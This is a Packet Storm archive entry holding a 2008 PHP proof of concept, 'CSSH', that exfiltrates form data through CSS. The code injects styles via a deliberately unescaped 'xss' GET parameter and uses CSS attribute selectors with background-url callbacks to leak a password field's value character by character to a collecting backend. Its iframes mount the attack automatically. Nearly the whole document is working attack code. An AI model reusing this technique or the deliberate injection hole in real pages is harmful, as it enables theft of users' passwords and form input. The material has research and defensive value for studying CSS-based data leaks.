css-read.txt

2008-10-23T00:00:00
ID PACKETSTORM:71168
Type packetstorm
Reporter Sirdarckcat
Modified 2008-10-23T00:00:00

Description

                                        
                                            `<?php  
/***** BEGIN LICENSE BLOCK *****  
  
CSSH - a proof of concept CSS based history crawler  
  
Copyright (C) 2008 Sirdarckcat  
  
This program is free software; you can redistribute it and/or modify  
it under the terms of the GNU General Public License as published by  
the Free Software Foundation; either version 2 of the License, or  
(at your option) any later version.  
  
This program is distributed in the hope that it will be useful,  
but WITHOUT ANY WARRANTY; without even the implied warranty of  
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the  
GNU General Public License for more details.  
  
You should have received a copy of the GNU General Public License  
along with this program; if not, write to the Free Software  
Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA  
  
***** END LICENSE BLOCK *****/  
  
if (isset($_GET['source'])) {  
highlight_file(__FILE__);  
exit();  
}  
  
session_start();  
$file=basename(__FILE__);  
$d=$_GET['d'];  
$i=$_GET['i'];  
if(isset($_GET['logout']))  
session_destroy();  
if(isset($_GET['debug']))  
print_r($_GET+$_SESSION);  
if(isset($_GET['css'])){  
switch($d){  
case 'range':  
ob_start("ob_gzhandler");  
$_SESSION['range']=Array();  
$_SESSION['value_']="";  
$_SESSION['_value']="";  
for($i=16;$i<=127;$i++){  
//echo 'input[value*="\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=range&i=%'.dechex($i).'");}';  
$_SESSION['range'][]=chr($i);  
}  
echo "body{background:url('$file?finished');}";  
break;  
case 'reading':  
while(empty($_SESSION['range']))sleep(1);  
sleep(5);//session_start() locks the file loading, and we wait 5 seconds for reading next char  
ob_start("ob_gzhandler");  
$range=$_SESSION['range'];  
$value_=strtr(urlencode($_SESSION['value_']),"%","\\");  
$_value=strtr(urlencode($_SESSION['_value']),"%","\\");  
foreach($range as $char){  
$i=ord($char);  
echo 'input[value^="'.$value_.'\\'.dechex($i).'"]{background:url("'.$file.'?backend&d=beg&i=%'.dechex($i).'");}';  
echo 'input[value$="\\'.dechex($i).$_value.'"] + *{background:url("'.$file.'?backend&d=end&i=%'.dechex($i).'");}';  
echo 'input[value="'.$value_."\\".dechex($i).$_value.'"]+*+*{background:url("'.$file.'?backend&d=fin&i='.$value_.$_value.'");}';  
echo "\n";  
}  
break;  
}  
}else if(isset($_GET['backend'])){  
switch($d){  
case 'range':  
$_SESSION['range'][]=$i;  
header('Location: http://p42.us/x.png');  
break;  
case 'beg':  
$_SESSION['value_'].=$i;  
case 'end':  
$_SESSION['_value']=$i.$_SESSION['_value'];  
case 'fin':  
$_SESSION['value']=$i;  
break;  
}  
}else if(isset($_GET['attack'])){  
?>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_?css%26d=range%22%3B</style>"></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<iframe src="<?php echo $file; ?>?xss=<style>@import %22<?php echo $file; ?>/_/_/_/_/_/_/_?css%26d=reading%22%3B</style>"/></iframe>  
<?php  
}else{  
if(isset($_POST['pass'])){  
$_SESSION['knownvalue']=$_POST['pass'];  
}  
?>  
<html>  
<head>  
<title>Start</title>  
<?php echo $_GET['xss'];?>  
</head>  
<body>  
<form method=POST>  
Enter something here and press enter <input name="pass" type="password" value="<?php echo $_SESSION['knownvalue']; ?>"/>  
</form>  
</body>  
</html>  
<?php  
}  
?>   
`